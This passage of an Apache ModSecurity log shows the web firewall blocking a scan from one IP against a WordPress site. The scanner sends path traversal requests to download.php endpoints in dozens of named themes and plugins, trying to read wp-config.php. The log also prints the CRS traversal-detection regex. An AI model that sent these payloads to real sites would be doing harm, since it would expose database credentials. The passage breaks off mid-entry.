"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yakimabait/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yakimabait/download.php"] [unique_id "Y0ZxVNmZws0mEkXxGo-VPwAAAJg"] [Wed Oct 12 02:48:36.548101 2022] [:error] [pid 22972:tid 140534458861312] [client 185.189.115.30:49874] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/TheLoft/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/TheLoft/download.php"] [unique_id "Y0ZxVOLrJ0tgpRmNRAaHmAAAAMg"] [Wed Oct 12 02:48:36.710752 2022] [:error] [pid 22339:tid 140534572447488] [client 185.189.115.30:49876] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/felis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/felis/download.php"] [unique_id "Y0ZxVNmZws0mEkXxGo-VQAAAAIM"] [Wed Oct 12 02:48:36.884783 2022] [:error] [pid 22972:tid 140534597625600] [client 185.189.115.30:49878] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "Y0ZxVOLrJ0tgpRmNRAaHmQAAAMA"] [Wed Oct 12 02:48:37.053697 2022] [:error] [pid 22972:tid 140534324578048] [client 185.189.115.30:49880] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinity/lib/scripts/download.php"] [unique_id "Y0ZxVeLrJ0tgpRmNRAaHmgAAANg"] [Wed Oct 12 02:48:37.212330 2022] [:error] [pid 22338:tid 140534450468608] [client 185.189.115.30:49882] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/epic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/epic/includes/download.php"] [unique_id "Y0ZxVWINFIoIk7hPzpaZJQAAAEk"] [Wed Oct 12 02:48:37.363262 2022] [:error] [pid 22972:tid 140534484039424] [client 185.189.115.30:49884] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "Y0ZxVeLrJ0tgpRmNRAaHmwAAAMU"] [Wed Oct 12 02:48:37.532491 2022] [:error] [pid 22972:tid 140534400112384] [client 185.189.115.30:49886] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "Y0ZxVeLrJ0tgpRmNRAaHnAAAAM8"] [Wed Oct 12 02:48:37.691007 2022] [:error] [pid 22339:tid 140534366541568] [client 185.189.115.30:49888] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "Y0ZxVdmZws0mEkXxGo-VQQAAAJM"] [Wed Oct 12 02:48:37.857777 2022] [:error] [pid 22339:tid 140534341363456] [client 185.189.115.30:49890] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lote27/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lote27/download.php"] [unique_id "Y0ZxVdmZws0mEkXxGo-VQgAAAJY"] [Wed Oct 12 02:48:38.011225 2022] [:error] [pid 22339:tid 140534484039424] [client 185.189.115.30:49892] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/linenity/functions/download.php"] [unique_id "Y0ZxVtmZws0mEkXxGo-VQwAAAIU"] [Wed Oct 12 02:48:38.191525 2022] [:error] [pid 22337:tid 140534374934272] [client 185.189.115.30:49894] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/medicate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/medicate/download.php"] [unique_id "Y0ZxVqBKlkjFPqrcdjM3rgAAABI"] [Wed Oct 12 02:48:38.373958 2022] [:error] [pid 22338:tid 140534349756160] [client 185.189.115.30:49896] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cuckootap/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cuckootap/download.php"] [unique_id "Y0ZxVmINFIoIk7hPzpaZJgAAAFU"] [Wed Oct 12 02:48:38.549178 2022] [:error] [pid 22339:tid 140534374934272] [client 185.189.115.30:49898] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IncredibleWP/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IncredibleWP/download.php"] [unique_id "Y0ZxVtmZws0mEkXxGo-VRAAAAJI"] [Wed Oct 12 02:48:38.707924 2022] [:error] [pid 22339:tid 140534400112384] [client 185.189.115.30:49900] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ultimatum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ultimatum/download.php"] [unique_id "Y0ZxVtmZws0mEkXxGo-VRQAAAI8"] [Wed Oct 12 02:48:38.860794 2022] [:error] [pid 22339:tid 140534458861312] [client 185.189.115.30:49902] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Centum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Centum/download.php"] [unique_id "Y0ZxVtmZws0mEkXxGo-VRgAAAIg"] [Wed Oct 12 02:48:39.012120 2022] [:error] [pid 22339:tid 140534589232896] [client 185.189.115.30:49904] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Avada/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Avada/download.php"] [unique_id "Y0ZxV9mZws0mEkXxGo-VRwAAAIE"] [Wed Oct 12 02:48:39.163481 2022] [:error] [pid 22972:tid 140534572447488] [client 185.189.115.30:49906] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/striking_r/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/striking_r/download.php"] [unique_id "Y0ZxV-LrJ0tgpRmNRAaHnQAAAMM"] [Wed Oct 12 02:48:39.347986 2022] [:error] [pid 22972:tid 140534383326976] [client 185.189.115.30:49908] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/beach_apollo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/beach_apollo/download.php"] [unique_id "Y0ZxV-LrJ0tgpRmNRAaHngAAANE"] [Wed Oct 12 02:48:39.514013 2022] [:error] [pid 22972:tid 140534408505088] [client 185.189.115.30:49910] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php"] [unique_id "Y0ZxV-LrJ0tgpRmNRAaHnwAAAM4"] [Wed Oct 12 02:48:39.665702 2022] [:error] [pid 22972:tid 140534589232896] [client 185.189.115.30:49912] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/newspro2891/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/newspro2891/download.php"] [unique_id "Y0ZxV-LrJ0tgpRmNRAaHoAAAAME"] [Wed Oct 12 02:48:39.816040 2022] [:error] [pid 22972:tid 140534467254016] [client 185.189.115.30:49914] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/draisabeladavid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/draisabeladavid/download.php"] [unique_id "Y0ZxV-LrJ0tgpRmNRAaHoQAAAMc"] [Wed Oct 12 02:48:39.983790 2022] [:error] [pid 22972:tid 140534433683200] [client 185.189.115.30:49916] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: 